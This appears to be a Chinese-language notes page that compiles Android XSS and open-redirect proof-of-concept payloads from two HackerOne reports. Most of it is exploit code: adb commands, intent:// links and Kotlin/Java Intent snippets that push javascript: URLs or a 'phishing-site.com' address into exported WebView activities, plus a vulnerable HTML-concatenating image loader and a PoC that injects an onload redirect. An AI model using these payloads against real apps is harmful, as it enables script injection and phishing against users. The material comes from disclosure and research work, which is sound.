android的应用中的xss和开放重定向payload

xss1

来源:https://hackerone.com/reports/2555949

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
adb shell am start -n ████/████████.kotlin.MVVM.Utils.Web.WebviewActivity --es URL "javascript:(function() { alert('XSS by Cleanchain') })();"
adb shell am start -n ████████/███.kotlin.MVVM.Utils.Web.WebviewActivity --es URL "https://URL"

<body>
    <a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS</a>

    <a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=https://URL;end">Open URL</a>

</body>



val intent = Intent().apply {  
    setClassName("█████", "███████.kotlin.MVVM.Utils.Web.WebviewActivity")  
    putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")  
}  
startActivity(intent)

val intent = Intent().apply {  
    setClassName("████", "██████.kotlin.MVVM.Utils.Web.WebviewActivity")  
    putExtra("URL", "https://URL")  
}  
startActivity(intent)



adb shell am start -n ██████████/███████.Utils.Web.WebviewActivity --es URL "javascript:(function() { alert('XSS by Cleanchain') })();"
adb shell am start -n ██████/█████████.Utils.Web.WebviewActivity --es URL "https://URL"



<body>
    <a href="intent://app/feedback#Intent;scheme=chdr;package=██████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS - █████████</a>

    <a href="intent://app/feedback#Intent;scheme=chdr;package=███;S.URL=https://URL;end">Open URL - ███</a>

</body>


val intent = Intent().apply {  
    setClassName("██████", "████████.Utils.Web.WebviewActivity")  
    putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")  
}  
startActivity(intent)

val intent = Intent().apply {  
    setClassName("███████", "████████.Utils.Web.WebviewActivity")  
    putExtra("URL", "https://URL")  
}  
startActivity(intent)




<body>
    <a href="intent://app/feedback#Intent;scheme=mymos;package=██████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS</a>
    <a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=https://phishing-site.com;end">Open Phishing Page</a>
</body>





val intent = Intent().apply {
    setClassName("██████", "████.kotlin.MVVM.Utils.Web.WebviewActivity")
    putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")
}
startActivity(intent)

val intent = Intent().apply {
    setClassName("███", "████████.kotlin.MVVM.Utils.Web.WebviewActivity")
    putExtra("URL", "https://phishing-site.com")
}
startActivity(intent)

方法中的参数用了html拼接 可以用了执行xss

来源:https://hackerone.com/reports/283063

原app的方法:

1
2
3
4
private void loadImage(String urlStr) {
        try {
            // ...
            this.mImage.loadDataWithBaseURL(null, "<!DOCTYPE html>\n<html><head><style>html, body, table { height: 100%; width: 100%; background-color: #000;}</style></head>\n<body>\n<table><tr><td><img src='" + new URL(urlStr).toString() + "' width='100%' onerror='Android.imageFailed()' onclick='Android.imageClicked()' style='background-color: #fff;'/>\n</td></tr></table></body>\n</html>", "text/html", "UTF-8", null);

poc:

1
2
3
4
Intent intent = new Intent();
       intent.setClassName("com.irccloud.android", "com.irccloud.android.activity.ImageViewerActivity");
       intent.setData(Uri.parse("https://shoppersocial.me/wp-content/uploads/2016/06/wow.jpg' onload='window.location.href=\"http://yahoo.com\""));
       startActivity(intent);